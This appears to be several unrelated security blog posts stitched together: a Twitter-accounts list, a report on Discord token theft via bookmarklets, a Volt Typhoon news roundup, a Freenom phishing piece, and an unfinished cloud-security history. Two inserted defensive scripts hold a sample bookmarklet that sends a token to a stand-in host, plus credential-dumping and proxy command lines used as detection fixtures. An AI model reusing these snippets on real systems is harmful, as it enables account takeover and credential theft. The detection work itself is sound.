Navigating the Cybersecurity Twitterverse | 23 Influential Accounts to Follow in 2023

Since our last post showcasing prominent cybersecurity accounts worth your follow, Twitter has occupied much of the limelight with stories about the tumultuous “takeover” including lawsuits, layoffs, and circulating concerns about free speech. Following Elon Musk’s acquisition in October 2022, many Twitter users flew the coop and migrated to the more decentralized social media platform Mastodon.

Though the open-source and crowdfunded Mastodon saw a huge surge in new accounts last winter, many new Mastodon users struggled to rebuild their complex social networks and have since returned to the blue bird app. For the cybersecurity community, Twitter remains the primary social media channel for all things cyber.

In the spirit of expanding our knowledge and resources, here are 23 hand-selected Twitter accounts we recommend to all those interested in learning about a wide variety of cybersecurity topics, issues, and news!

1. @matrosov | Alex Matrosov

Alex Matrosov is CEO and co-founder of Binarly Inc., where he builds an AI-powered platform to protect devices against emerging firmware threats. Alex has more than two decades of experience with reverse engineering, advanced malware analysis, firmware security, and exploitation techniques. He served as Chief Offensive Security Researcher at Nvidia and Intel Security Center of Excellence (SeCoE).

2. @r00tbsd | Paul Rascagnères

Paul Rascagnères is a Principal Threat Researcher at Volexity. He performs investigations to identify new threats, and he has presented his findings in several publications and at international security conferences.

3. @silascutler | Silas Cutler

Silas Cutler is a Resident Hacker at Stairwell. He specializes in hunting advanced threat actors and malware developers, nation states and organized cybercrime groups. Prior to Stairwell, Silas was a threat intelligence practitioner at CrowdStrike, Google, Chronicle and Dell Secureworks.

4. @Wanna_VanTa | Van Ta

Van Ta is a Principal Threat Analyst on Mandiant’s Advanced Practices Team, where he leads historical research into the most impactful adversaries facing Mandiant’s customers. His research on named threat actors such as FIN11, FIN12, FIN13, and APT41 has been referenced by both private and public organizations.

5. @n0x08 | Nate Warfield

After shipping the MS17-010, Spectre/Meltdown and BlueKeep patches in his 4.5-year tenure at the Microsoft Security Response Center, Nate Warfield is currently the Director of Threat Research & Intelligence for Eclypsium. He was featured in WIRED magazine’s “25 people doing good in 2020” for his role in starting CTI League, a volunteer group of InfoSec professionals who provided threat intelligence to hospitals during COVID-19.

6. @LittleJoeTables | Joe DeMesy

Joe DeMesy is a Principal at Bishop Fox. Joe is an expert in red teaming and secure development, is proficient in several programming languages, and is a leading contributor to various open source projects. He is a noted expert in the field of information security, having been quoted in MarketWatch, NPR, InformationWeek, and Dark Reading. He has also presented his research at conferences such as BSidesLV, Kiwicon, Black Hat and private conferences hosted by the US Department of Defense.

7. @greglesnewich | Greg Lesnewich

Greg Lesnewich is senior threat researcher at Proofpoint, working on tracking malicious activity linked to the DPRK (North Korea). Greg has a background in threat intelligence, incident response, and managed detection, and previously built a threat intelligence program for a Fortune 50 financial organization.

8. @hasherezade | Aleksandra Doniec

Aleksandra “Hasherezade” Doniec is a prolific Malware Intelligence Analyst, software engineer, and consultant based in Warsaw, Poland. She is known for bringing valuable information on the infamous NotPetya ransomware to light and for releasing some of the most in-depth analysis of the Kronos malware available to date. A Forbes 30 Under 30 alumna, she has written multiple tools and scripts used by security researchers around the world today.

9. @stvemillertime | Steve Miller

Steve Miller is a New York-based security researcher focused on adversary tradecraft, operating at the intersection of incident response, threat intelligence, and detection engineering. He is an alumnus of Champlain College, Mandiant, the U.S. Department of Homeland Security, the U.S. Department of State, the U.S. Army Intelligence and Security Command (INSCOM), and the National Security Agency. Currently, Steve is a Senior Threat Intelligence Analyst for MSTIC with particular interest in YARA, Synapse, malware methods, crowdsourcing, terrestrial RF, analogue synthesizers, and emergency management.

10. @kyleehmke | Kyle Ehmke

A Threat Intelligence Researcher with ThreatConnect, Kyle Ehmke has garnered ten years of experience as a cyber intelligence analyst. His most recent work with ThreatConnect has shed light on Russian election activity and targeted efforts against Bellingcat, WADA, and others. Kyle largely focuses his research on influence operations to better understand foreign and domestic actors’ information operations infrastructure.

11. @ophirharpaz | Ophir Harpaz

A Forbes 30 Under 30 alumna, Ophir Harpaz is currently Security Research Team Lead at Akamai Technologies. She is also an active member of Baot, a community supporting women developers, data scientists, and researchers, where she co-manages a tech-blogging program. Ophir has presented at many conferences on cryptomining campaigns, attacks on data centers, and financial malware. Most recently, she was awarded the Rising Star category of SC Magazine’s Reboot awards. Ophir is passionate about keeping her reverse engineering skills sharp in her free time.

12. @oxleyio | David Oxley

A Security Engineering Manager at AWS, David Oxley is an experienced leader of cyber espionage threat intelligence teams and has specialized in building cloud-first, threat-centric cyber threat intelligence teams in the technology sector. David’s work is driven by the intersection of human rights and cybersecurity. Prior to his work with AWS, David investigated APT and criminal actors, served as a federal agent, worked as a digital forensic examiner, and taught in both academic and corporate settings.

13. @malwareunicorn | Amanda Rousseau

Amanda Rousseau is Principal Security Engineer at Microsoft with experience in dynamic behavior detection on both Windows and macOS, reverse engineering, malware evasion techniques, and developing runtime detections. Before Microsoft, Amanda worked at Facebook, Endgame, and FireEye, lending her skills to DoD forensic investigations and commercial incident response engagements.

14. @cybersecmeg | Meg West

Meg West is a Cybersecurity Incident Response Consultant for IBM’s X-Force Incident Response team as well as a known SME in SAP security. With over 20,000 subscribers to her cyber education YouTube channel, Meg is passionate about creating free cybersecurity content to share on various platforms and spends her free time mentoring college students as they enter the cybersecurity field. She has spoken at several international Cybersecurity conferences including ISC2’s Security Congress and SAP’s SAPPHIRE NOW.

15. @AmarSaar | Saar Amar

Saar Amar is a security researcher at MSRC with expertise on vulnerability research and exploitation. Focused on reverse engineering, low-level/internals, and cloud security, Saar is well versed in exploiting everything from operating systems to hypervisors and browsers. Saar speaks at various international cyber conferences globally and regularly publishes original research to share with the greater defense community.

16. @ale_sp_brazil | Alexandre Borges

A long-time SME in reverse engineering and digital forensic analysis, Alexandre Borges is currently at Blackstorm Security where he specializes in exploit development, threat hunting, malware analysis, and vulnerability research. He also provides cybersecurity education, training learners around the world on topics such as malware and memory analysis, mobile reversing, and more. Alexandre is the creator and administrator of the Malwoverview triage tool available on GitHub and is a regular speaker at many prominent cyber events including DEF CON USA, DEF CON CHINA, NO HAT Conference, DC2711, HITB, H2HC, and BHACK.

17. @maddiestone | Maddie Stone

Maddie Stone is a prominent security researcher on Google’s Project Zero team, where she focuses on identifying zero-days exploited in the wild. Maddie has also held reverse engineering and cyber system engineering roles on Google’s Android security team and at Johns Hopkins University’s Applied Physics Lab, respectively. She has spoken at various cybersecurity conferences and teaches workshops to help develop a new generation of cyber defenders.

18. @cyberwarship | Florian Hansemann

Munich-based Florian Hansemann is the founder of HanseSecure, an established cybersecurity company dedicated to identifying and publishing vulnerabilities in hardware and software to educate fellow defenders in the space. Florian has expressed interest in many areas of technical IT security but notes a special passion for red teaming and penetration testing of enterprises.

19. @dinosn | Nicolas Krassas

Nicolas Krassas, Head of Threat & Vulnerability Management for Henkel, has deep experience in malware analysis, forensic data evaluation, system and network security, reverse engineering, and auditing. Prior to Henkel, Nicolas worked for Hack The Box, GIG Technology, and Effortel, holding CSO and CTO positions and handling critical cases and projects. He often shares cyber news affecting multiple industries on his Twitter account to raise awareness of the latest attacks and threat intel.

20. @h2jazi | Hossein Jazi

Hossein Jazi is currently a Senior Cyber Threat Intelligence Specialist at Fortinet with a special interest in tracking advanced persistent threats (APTs), malware analysis, cyber threat intelligence, and machine learning. Prior to his role with Fortinet, he has also worked as a threat analyst for Malwarebytes, Cysiv, Trend Micro, and Bell. Hossein’s current focus is on detecting and tracking APT campaigns in North America as well as developing big data machine learning based models to attribute threat actors.

21. @bushidotoken | Will Thomas

Will Thomas is a prominent cybersecurity researcher whose work has been featured by several well-known publications such as The Telegraph, VICE, CyberScoop, BleepingComputer, The Register, KrebsOnSecurity, VirusTotal, and more. Currently a CTI researcher and threat hunter at the Equinix Threat Analysis Center (ETAC), he has previously appeared on Darknet Diaries, spoken at multiple conferences including DEF CON 29, conINT, and NFCERT’s annual conference, and is the author of the SANS FOR589: Cybercrime Intelligence course.

22. @milenkowski | Aleksandar Milenkoski

Aleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs, with expertise in reverse engineering, malware research, and threat actor analysis. Aleksandar has a PhD in system security and is the author of numerous research papers, book chapters, blog posts, and conference talks. His research has won awards from SPEC, the Bavarian Foundation for Science, and the University of Würzburg.

23. @tomhegel | Tom Hegel

Tom Hegel is a Senior Threat Researcher with SentinelLabs. He comes from a background of detection and analysis of malicious actors, malware, and global events with an application to the cyber domain. His past research has focused on threats impacting individuals and organizations across the world, primarily targeted attackers.

Conclusion

It will likely be some time before the dust settles on the futures of Twitter and other microblogging platforms, but the cybersecurity community will continue to build on shared knowledge and new research. For this post, we’ve sifted through such a small corner of Twitter to highlight 23 accounts covering a variety of malware research, reverse engineering tactics, cyber news, and more.

Don’t forget to check out our previous lists here and here and if you’re a fan of all things Apple, we even have a dedicated list of great Twitter accounts for iOS and macOS.

If you think we’ve missed any essential accounts, connect with us on Twitter by following @SentinelOne! You can also keep up to date with all of the latest threat intel coming from our SentinelLabs team on Twitter as well – we’ll be glad to meet you there.

Discord Admins Hacked by Malicious Bookmarks

A number of Discord communities focused on cryptocurrency have been hacked this past month after their administrators were tricked into running malicious JavaScript code disguised as a Web browser bookmark.

This attack involves malicious JavaScript that is added to one’s browser by dragging a component from a web page to one’s browser bookmarks.

According to interviews with victims, several of the attacks began with an interview request from someone posing as a reporter for a crypto-focused news outlet online. Those who take the bait are sent a link to a Discord server that appears to be the official Discord of the crypto news site, where they are asked to complete a verification step to validate their identity.

As shown in this YouTube video, the verification process involves dragging a button from the phony crypto news Discord server to the bookmarks bar in one’s Web browser. From there, the visitor is instructed to go back to discord.com and then click the new bookmark to complete the verification process.

However, the bookmark is actually a clever snippet of JavaScript that quietly grabs the user’s Discord token and sends it to the scammer’s website. The attacker then loads the stolen token into their own browser session and (usually late at night after the admins are asleep) posts an announcement in the targeted Discord about an exclusive “airdrop,” “NFT mint event” or some other potential money-making opportunity for the Discord members.

The unsuspecting Discord members click the link provided by the compromised administrator account, and are asked to connect their crypto wallet to the scammer’s site, where it asks for unlimited spend approvals on their tokens, and subsequently drains the balance of any valuable accounts.

Meanwhile, anyone in the compromised Discord channel who notices the scam and replies is banned, and their messages are deleted by the compromised admin account.

Nicholas Scavuzzo is an associate at Ocean Protocol, which describes itself as an “open-source protocol that aims to allow businesses and individuals to exchange and monetize data and data-based services.” On May 22, an administrator for Ocean Protocol’s Discord server clicked a link in a direct message from a community member that prompted them to prove their identity by dragging a link to their bookmarks.

Scavuzzo, who is based in Maine, said the attackers waited until around midnight in his time zone before using the administrator’s account to send out an unauthorized message about a new Ocean airdrop.

Scavuzzo said the administrator’s account was hijacked even though she had multi-factor authentication turned on.

“A CAPTCHA bot that allows Discord cookies to be accessed by the person hosting the CAPTCHA,” was how Scavuzzo described the attack. “I’ve seen all kinds of crypto scams, but I’ve never seen one like this.”

In this conversation, “Ana | Ocean” is a compromised Discord server administrator account promoting a phony airdrop.

Importantly, the stolen token only works for the attackers as long as its rightful owner doesn’t log out and back in, or else change their credentials.

Assuming the administrator can log in, that is. In Ocean’s case, one of the first things the intruders did once they swiped the administrator’s token was change the server’s access controls and remove all core Ocean team members from the server.

Fortunately for Ocean, Scavuzzo was able to reach the operator of the server that hosts the Discord channel, and have the channel’s settings reverted back to normal.

“Thankfully, we are a globally distributed team, so we have people awake at all hours,” Scavuzzo said, noting that Ocean is not aware of any Discord community members who fell for the phony airdrop offer, which was live for about 30 minutes. “This could have been a lot worse.”

On May 26, Aura Network reported on Twitter that its Discord server was compromised in a phishing attack that resulted in the deletion of Discord channels and the dissemination of fake Aura Network Airdrop Campaign links.

On May 27, Nahmii — a cryptocurrency technology based on the Ethereum blockchain — warned on Twitter that one of its community moderators on Discord was compromised and posting fake airdrop details.

On May 9, MetrixCoin reported that its Discord server was hacked, with fake airdrop details pushed to all users.

KrebsOnSecurity recently heard from a trusted source in the cybersecurity industry who dealt firsthand with one of these attacks and asked to remain anonymous.

“I do pro bono Discord security work for a few Discords, and I was approached by one of these fake journalists,” the source said. “I played along and got the link to their Discord, where they were pretending to be journalists from the Cryptonews website using several accounts.”

The source took note of all the Discord IDs of the admins of the fake Cryptonews Discord, so that he could ensure they were blocked from the Discords he helps to secure.

“Since I’ve been doing this for a while now, I’ve built up a substantial database of Discord users and messages, so often I can see these scammers’ history on Discord,” the source said.

In this case, he noticed a user with the “CEO” role in the fake Cryptonews Discord had been seen previously under another username — “Levatax.” Searching on that Discord ID and username revealed a young Turkish coder named Berk Yilmaz whose Github page linked to the very same Discord ID as the scammer CEO.

Reached via instant message on Telegram, Levatax said he’s had no involvement in such schemes, and that he hasn’t been on Discord since his Microsoft Outlook account was hacked months ago.

“The interesting thing [is] that I didn’t use Discord since few months or even social media because of the political status of Turkey,” Levatax explained, referring to the recent election in his country. “The only thing I confirm is losing my Outlook account which connected to my Discord, and I’m already in touch with Microsoft to recover it.”

The verification method used in the above scam involves a type of bookmark called a “bookmarklet” that stores JavaScript code, as a URL beginning with javascript:, behind a clickable link in the bookmarks bar at the top of one’s browser. Clicking it does not navigate anywhere; the browser runs the code inside whatever page is currently open, with that page’s access to its cookies, local storage and logged-in session. That is why the scammers tell the victim to go back to discord.com before clicking.

While bookmarklets can be useful and harmless, malicious JavaScript that the user executes in the browser this way bypasses the same-origin protections that would stop a foreign site from reading that data, which is what makes it especially dangerous. So please avoid adding (or dragging) any bookmarks or bookmarklets to your browser unless it was your idea in the first place.
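One practical check for the behaviour described above, added here as an example rather than taken from the original article: a script that scans a browser’s exported bookmarks file (the Netscape HTML format that Chrome and Firefox produce) for javascript: bookmarklets, percent-decodes their code and flags any that both read client-side storage and send data to another host. The sample export, the hostname verify.example.invalid and the two bookmarklet bodies in it are constructed for the demo and are not the scammers’ actual code.

```python
"""Find javascript: bookmarklets in a bookmarks export and flag token-exfiltration patterns."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed sample in the Netscape bookmark-file format (not a real victim's export).
SAMPLE_EXPORT = """<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL><p>
    <DT><A HREF="https://discord.com/channels/@me">Discord</A>
    <DT><A HREF="javascript:(function(){document.body.style.zoom='150%'})()">Zoom page</A>
    <DT><A HREF="javascript:(function(){var%20t=localStorage.getItem('token');new%20Image().src='https://verify.example.invalid/c?t='+encodeURIComponent(t)})()">Verify</A>
</DL><p>
"""

# Reads of client-side secrets, and sinks that can carry them off the page.
SECRET_READS = re.compile(r"localStorage|sessionStorage|document\.cookie|indexedDB|\btoken\b", re.I)
EXFIL_SINKS = re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon|new\s+Image\(|\.src\s*=|WebSocket\(", re.I)
URL_IN_CODE = re.compile(r"https?://[^\s'\"()]+")


class _LinkCollector(HTMLParser):
    """Collect (href, link text) pairs from <A> elements."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def parse_bookmarks(html):
    parser = _LinkCollector()
    parser.feed(html)
    return parser.links


def analyse_bookmarklet(href):
    """Return a finding for a javascript: URL, or None for an ordinary link."""
    scheme, _, rest = href.partition(":")
    if scheme.strip().lower() != "javascript":
        return None
    code = unquote(rest)  # bookmarklets are usually stored percent-encoded
    hosts = sorted({urlsplit(u).hostname for u in URL_IN_CODE.findall(code)})
    reads = bool(SECRET_READS.search(code))
    sends = bool(EXFIL_SINKS.search(code))
    # Reading storage alone is common in benign bookmarklets; the combination
    # of a secret read and a network sink is the signal worth acting on.
    if reads and sends:
        verdict = "exfiltration"
    elif reads or sends or hosts:
        verdict = "review"
    else:
        verdict = "benign"
    return {"code": code, "reads_secrets": reads, "network_sink": sends,
            "hosts": hosts, "verdict": verdict}


def scan(html):
    """Scan a bookmarks export and return one finding per bookmarklet."""
    findings = []
    for href, title in parse_bookmarks(html):
        finding = analyse_bookmarklet(href)
        if finding:
            finding["title"] = title
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EXPORT):
        print(f"{f['title']!r}: {f['verdict']} hosts={f['hosts']}")
```

Run it against a real export (Chrome: Bookmark manager, Export bookmarks) to list every bookmarklet present; anything rated “exfiltration” that you do not remember writing yourself should be deleted, and the session it could have reached should be logged out and back in so the token is rotated.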

The Good, the Bad and the Ugly in Cybersecurity – Week 21

Private Sector Offensive Actor | FinFisher Execs Charged for Selling Spyware to Turkey

Prosecutors in Germany this week indicted four executives of spyware firm FinFisher for selling the FinSpy hacking tool to Turkey’s intelligence agency.

FinFisher produces cross-platform espionage tools for what it describes as “tactical intelligence gathering”, “strategic intelligence gathering”, and “deployment methods and exploitation”. The company’s marketing material states that it only partners with “Law Enforcement and Intelligence Agencies” and has a “worldwide presence”.

However, in 2020, Amnesty International warned that FinSpy was being used in campaigns targeting human rights activists, journalists and dissidents in Egypt, Ethiopia, and the United Arab Emirates (UAE) among others.

Now, German prosecutors say that FinFisher evaded export controls on its spyware in 2015 and sold it to a Bulgarian company being used as a front for Turkey’s intelligence agency. There are suggestions that the spyware was used to target opponents of President Erdoğan in 2017.

The prosecutors allege that four FinFisher executives, who were only identified by single initials, signed a deal with the Turkish government for the spyware along with technical support and training. The deal was thought to be worth around $5 million.

FinFisher has since ceased trading, but a spokesperson for the European Center for Constitutional and Human Rights warned:

“So far, companies like FinFisher have been able to export almost unhindered worldwide despite European export regulations. Today’s indictment is long overdue and will hopefully lead to the conviction of the responsible managing directors in the near future. But beyond that, the EU and its member states must take much more decisive action against the massive misuse of surveillance technology.”

Ransomware | Insider Threat As Employee Tried to Siphon Off Ransom Payment

The threat of ransomware has loomed large over the last few years, with threat actors aggressively exploiting any weaknesses they can find in organizations’ defenses and constantly innovating in response to detection and prevention strategies. But one attack vector few are looking for is an insider threat that positions themselves between the business and the ransomware gang in an attempt to steal the ransom payment.

This week Ashley Liles, formerly an IT security analyst at Oxford Biomedica, pleaded guilty in a UK court to doing just that after his employer was hit with a ransomware attack in February 2018. Liles was among those responsible for investigating the attack, but surreptitiously began accessing a board member’s emails as the company negotiated with the attackers.

Liles altered an email from the attackers to insert his own bitcoin payment details, then created an email address similar to the attacker’s and began sending pressurizing emails to his employers.


Had a payment been made, it’s fairly certain that Liles would have been rapidly exposed, as the original attackers would have soon made it clear they had not received the funds. However, as the company chose not to pay the ransom, Liles received no payment and may have thought he had escaped justice.

Unfortunately for him, the unauthorized access to the board member’s emails was noticed and tracked down to Liles’ home address. Police later seized his devices and recovered incriminating evidence despite his attempts to wipe the data. Liles, now aged 28, pleaded guilty in court and will be sentenced in July.

Volt Typhoon | Chinese-sponsored Threat Actor Targets US Critical Infrastructure

CISA, the FBI and other partners have this week warned that a Chinese state-sponsored threat actor has been targeting U.S. critical infrastructure organizations since 2021 in activity that appears designed to aid China in any potential conflict between the two superpowers. Among the targets were organizations on Guam, a vital part of America’s Asia-Pacific defense strategy and home to Andersen Air Force Base and Naval Base Guam.

Andersen Air Force Base, Guam. Source: Andersen Air Force.

The threat actor, labeled “Volt Typhoon”, leverages compromised or vulnerable small office/home office (SOHO) devices to gain initial access to organizations’ networks and to route its traffic so that it blends in with normal activity. Observed TTPs include exploiting CVE-2021-40539 and CVE-2021-27860 and attacking devices such as ASUS, Cisco RV, DrayTek Vigor, FatPipe IPVPN/MPVPN/WARP, Fortinet FortiGate, Netgear ProSAFE, and Zyxel USG.

Having once gained a foothold, the threat actor relies heavily on Windows LOLBins – legitimate programs already installed on host computers – to conduct its malicious activities and evade discovery.

CISA’s advisory noted that the actor makes use of WMI/WMIC to stealthily gather information about local drives, as WMI logging is not enabled by default. PowerShell and certutil were among a long list of living off the land tools used for discovery, lateral movement and collection:

  • certutil
  • dnscmd
  • ldifde
  • makecab
  • net user/group/use
  • netsh
  • nltest
  • ntdsutil
  • PowerShell
  • reg query/save
  • systeminfo
  • tasklist
  • wevtutil
  • wmic
  • xcopy

In addition, “hacktools” such as FRP (Fast Reverse Proxy), Impacket, and Mimikatz as well as remote administration tools were also characteristic of the attacks.

Researchers believe that the primary objective of Volt Typhoon is to enable China to disrupt critical communications infrastructure during any future crisis, and organizations are on alert that the same stealthy tactics seen in this campaign could be used against organizations worldwide. The joint advisory contains detailed information on threat hunting and detection mitigations.
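An added hunting example, not taken from the joint advisory or from SentinelOne, that turns the list above into something a defender can run over process-creation telemetry (Sysmon Event ID 1 or Security 4688 exported as JSON lines). It does two things: applies a handful of high-signal command-line rules, and, separately, flags any host on which several of the listed binaries run within one window, because a single certutil or tasklist is routine administration while a cluster of them on one box is not. The events are constructed, the regexes paraphrase publicly documented abuse of these tools rather than the advisory’s indicator list, and the ATT&CK technique IDs are assigned here.

```python
"""Hunt for living-off-the-land clusters and high-signal LOLBin command lines."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Binaries from the advisory's LOLBin list. Any one of them alone is weak evidence.
LOLBINS = {
    "certutil.exe", "dnscmd.exe", "ldifde.exe", "makecab.exe", "net.exe", "net1.exe",
    "netsh.exe", "nltest.exe", "ntdsutil.exe", "powershell.exe", "reg.exe",
    "systeminfo.exe", "tasklist.exe", "wevtutil.exe", "wmic.exe", "xcopy.exe",
}

# (rule name, command-line regex, ATT&CK technique assigned here).
# Patterns paraphrase documented abuse; they are not the advisory's IOCs.
HIGH_SIGNAL = [
    ("ntds_dump",     r"ntdsutil(\.exe)?\b.*\b(ac\s+i\s+ntds|ifm|create\s+full)\b", "T1003.003"),
    ("hive_dump",     r"reg(\.exe)?\s+save\s+hklm\\(sam|security|system)\b",        "T1003.002"),
    ("portproxy",     r"netsh(\.exe)?\s+interface\s+portproxy\s+add\b",              "T1090.001"),
    ("wmic_recon",    r"wmic(\.exe)?\b.*\b(volume|logicaldisk|product|service|baseboard)\b.*\b(list|get)\b", "T1082"),
    ("eventlog_pull", r"wevtutil(\.exe)?\s+(qe|cl)\s+security\b",                   "T1070.001"),
    ("trust_enum",    r"nltest(\.exe)?\b.*/domain_trusts\b",                         "T1482"),
]

# Constructed sample telemetry (not real victim data).
SAMPLE_EVENTS = r"""
{"ts": "2023-05-20T02:11:03", "host": "DC01", "user": "CORP\\svc_backup", "image": "wmic.exe", "cmdline": "wmic volume list brief"}
{"ts": "2023-05-20T02:12:40", "host": "DC01", "user": "CORP\\svc_backup", "image": "ntdsutil.exe", "cmdline": "ntdsutil \"ac i ntds\" ifm \"create full C:\\Windows\\Temp\\tmp\" q q"}
{"ts": "2023-05-20T02:13:15", "host": "DC01", "user": "CORP\\svc_backup", "image": "makecab.exe", "cmdline": "makecab \"C:\\Windows\\Temp\\tmp\\Active Directory\\ntds.dit\" C:\\Windows\\Temp\\tmp\\ntds.cab"}
{"ts": "2023-05-20T02:15:00", "host": "DC01", "user": "CORP\\svc_backup", "image": "netsh.exe", "cmdline": "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=10.0.0.5 connectport=8443"}
{"ts": "2023-05-20T09:30:00", "host": "WS-042", "user": "CORP\\jdoe", "image": "powershell.exe", "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"}
{"ts": "2023-05-20T09:31:00", "host": "WS-042", "user": "CORP\\jdoe", "image": "tasklist.exe", "cmdline": "tasklist /svc"}
"""


def parse_events(jsonl):
    """Parse JSON lines into event dicts with a datetime timestamp."""
    events = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        event["ts"] = datetime.fromisoformat(event["ts"])
        events.append(event)
    return events


def match_rules(events):
    """Return one hit per (event, rule) whose command line matches a high-signal pattern."""
    hits = []
    for e in events:
        for name, pattern, technique in HIGH_SIGNAL:
            if re.search(pattern, e["cmdline"], re.I):
                hits.append({"ts": e["ts"].isoformat(), "host": e["host"], "user": e.get("user"),
                             "rule": name, "technique": technique, "cmdline": e["cmdline"]})
    return hits


def lolbin_clusters(events, window=timedelta(hours=24), threshold=3):
    """Hosts on which at least `threshold` distinct LOLBins ran within `window`."""
    by_host = defaultdict(list)
    for e in events:
        if e["image"].lower() in LOLBINS:
            by_host[e["host"]].append(e)
    clusters = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda ev: ev["ts"])
        best = set()
        for i, first in enumerate(evs):  # sliding window anchored on each event
            tools = {ev["image"].lower() for ev in evs[i:] if ev["ts"] - first["ts"] <= window}
            if len(tools) > len(best):
                best = tools
        if len(best) >= threshold:
            clusters[host] = sorted(best)
    return clusters


def hunt(jsonl):
    events = parse_events(jsonl)
    return {"hits": match_rules(events), "clusters": lolbin_clusters(events)}


if __name__ == "__main__":
    result = hunt(SAMPLE_EVENTS)
    for h in result["hits"]:
        print(f"[{h['technique']}] {h['host']} {h['ts']} {h['rule']}: {h['cmdline']}")
    for host, tools in result["clusters"].items():
        print(f"LOLBin cluster on {host}: {', '.join(tools)}")
```

On the sample, DC01 produces three rule hits (volume reconnaissance, an NTDS.dit snapshot, and a portproxy rule that turns the host into a relay) plus a four-tool cluster, while the workstation running a scheduled inventory script and tasklist stays below the threshold. The threshold and window are the knobs to tune against your own baseline; domain controllers and jump hosts legitimately run more of these tools than user endpoints do.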

Phishing Domains Tanked After Meta Sued Freenom

The number of phishing websites tied to domain name registrar Freenom dropped precipitously in the months surrounding a recent lawsuit from social networking giant Meta, which alleged the free domain name provider has a long history of ignoring abuse complaints about phishing websites while monetizing traffic to those abusive domains.

The volume of phishing websites registered through Freenom dropped considerably since the registrar was sued by Meta. Image: Interisle Consulting.

Freenom is the domain name registry service provider for five so-called “country code top level domains” (ccTLDs), including .cf for the Central African Republic; .ga for Gabon; .gq for Equatorial Guinea; .ml for Mali; and .tk for Tokelau.

Freenom has always waived the registration fees for domains in these country-code domains, but the registrar also reserves the right to take back free domains at any time, and to divert traffic to other sites — including adult websites. And there are countless reports from Freenom users who’ve seen free domains removed from their control and forwarded to other websites.

By the time Meta initially filed its lawsuit in December 2022, Freenom was the source of well more than half of all new phishing domains coming from country-code top-level domains. Meta initially asked a court to seal its case against Freenom, but that request was denied. Meta withdrew its December 2022 lawsuit and re-filed it in March 2023.

“The five ccTLDs to which Freenom provides its services are the TLDs of choice for cybercriminals because Freenom provides free domain name registration services and shields its customers’ identity, even after being presented with evidence that the domain names are being used for illegal purposes,” Meta’s complaint charged. “Even after receiving notices of infringement or phishing by its customers, Freenom continues to license new infringing domain names to those same customers.”

Meta pointed to research from Interisle Consulting Group, which discovered in 2021 and again last year that the five ccTLDs operated by Freenom made up half of the Top Ten TLDs most abused by phishers.

Interisle partner Dave Piscitello said something remarkable has happened in the months since the Meta lawsuit.

“We’ve observed a significant decline in phishing domains reported in the Freenom commercialized ccTLDs in months surrounding the lawsuit,” Piscitello wrote on Mastodon. “Responsible for over 60% of phishing domains reported in November 2022, Freenom’s percentage has dropped to under 15%.”

Interisle collects data from 12 major blocklists for spam, malware, and phishing, and it receives phishing-specific data from Spamhaus, Phishtank, OpenPhish and the APWG Ecrime Exchange. The company publishes historical data sets quarterly, both on malware and phishing.

Piscitello said it’s too soon to tell the full impact of the Freenom lawsuit, noting that Interisle’s sources of spam and phishing data all have different policies about when domains are removed from their block lists.

“One of the things we don’t have visibility into is how each of the blocklists determine to remove a URL from their lists,” he said. “Some of them time out [listed domains] after 14 days, some do it after 30, and some keep them forever.”

Freenom did not respond to requests for comment.

This is the second time in as many years that a lawsuit by Meta against a domain registrar has disrupted the phishing industry. In March 2020, Meta sued domain registrar giant Namecheap, alleging cybersquatting and trademark infringement.

The two parties settled the matter in April 2022. While the terms of that settlement have not been disclosed, new phishing domains registered through Namecheap declined more than 50 percent the following quarter, Interisle found.

Phishing attacks using websites registered through Namecheap, before and after the registrar settled a lawsuit with Meta. Image: Interisle Consulting.

Unfortunately, the lawsuits have had little effect on the overall number of phishing attacks and phishing-related domains, which have steadily increased in volume over the years.  Piscitello said the phishers tend to gravitate toward registrars that offer the least resistance and lowest price per domain. And with new top-level domains constantly being introduced, there is rarely a shortage of super low-priced domains.

“The abuse of a new top-level domain is largely the result of one registrar’s portfolio,” Piscitello told KrebsOnSecurity. “Alibaba or Namecheap or another registrar will run a promotion for a cheap domain, and then we’ll see flocking and migration of the phishers to that TLD. It’s like strip mining, where they’ll buy hundreds or thousands of domains, use those in a campaign, exhaust that TLD and then move on to another provider.”

Piscitello said despite the steep drop in phishing domains coming out of Freenom, the alternatives available to phishers are many. After all, there are more than 2,000 accredited domain registrars, not to mention dozens of services that let anyone set up a website for free without even owning a domain.

“There is no evidence that the trend line is even going to level off,” he said. “I think what the Meta lawsuit tells us is that litigation is like giving someone a standing eight count. It temporarily disrupts a process. And in that sense, litigation appears to be working.”

Evolution of Cloud Security | Looking At Cloud Posture Management Throughout the Decades

When cloud computing saw its earliest waves of adoption, businesses only had to decide whether or not they wanted to adopt it. The notion of cloud security in these first few years came as a secondary consideration. Though cloud computing has undergone many improvements since it made a splash following the advent of the World Wide Web, the challenge of cloud security has only become more complex and the need for it more acute.

Today’s hyperconnected world sees the cloud surface face a variety of risks from ransomware and supply chain attacks to insider threats and misconfigurations. As more businesses have moved their operations and sensitive data to the cloud, securing this environment against developing threats continues to be an ever-changing challenge for leaders.

This post walks through a timeline of how cloud security has grown over recent years to combat new and upcoming risks associated with its use. Following this timeline, security leaders can implement the latest in cloud security based on their own unique business requirements.

The Early 00s | Cloud Security In Its Infancy

When businesses first began to embrace the web in the 90s, the need for data centers boomed. Many businesses had a newfound reliance on shared hosting as well as on the dedicated servers upon which their operations ran. Shortly after the turn of the century, this new, virtual environment became known as the “cloud”. Booming demand for the cloud then spurred a digital race between Amazon, Microsoft, and Google to gain market share as cloud providers.

